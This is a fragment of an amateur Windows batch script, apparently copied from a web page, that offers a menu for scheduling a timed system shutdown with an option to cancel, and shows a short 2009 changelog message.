If '%note%'=='7200' start C:\Windows\System32\shutdown.exe -s -t 7200 -c "Complete!
Type "yes" in the box to cancel"
If '%note%'=='20000' start C:\Windows\System32\shutdown.exe -s -t 20000 -c
"Complete! Type "yes" in the box to cancel"
If '%note%'=='back' goto menuos

echo Want to cancel?

set /p note=
If '%note%'=='yes' start shutdown -a
If '%note%'=='no' goto timefinish

echo Completed. The timer has been set


echo Have a nice day!

:timefinish

pause
goto menuos

:eleven
msg * May 27, 2009 I have finished this update on the program ive added 10
functions im going to add more and i will keep adding changes to this change log
goto menuos

:end

exit

You might also like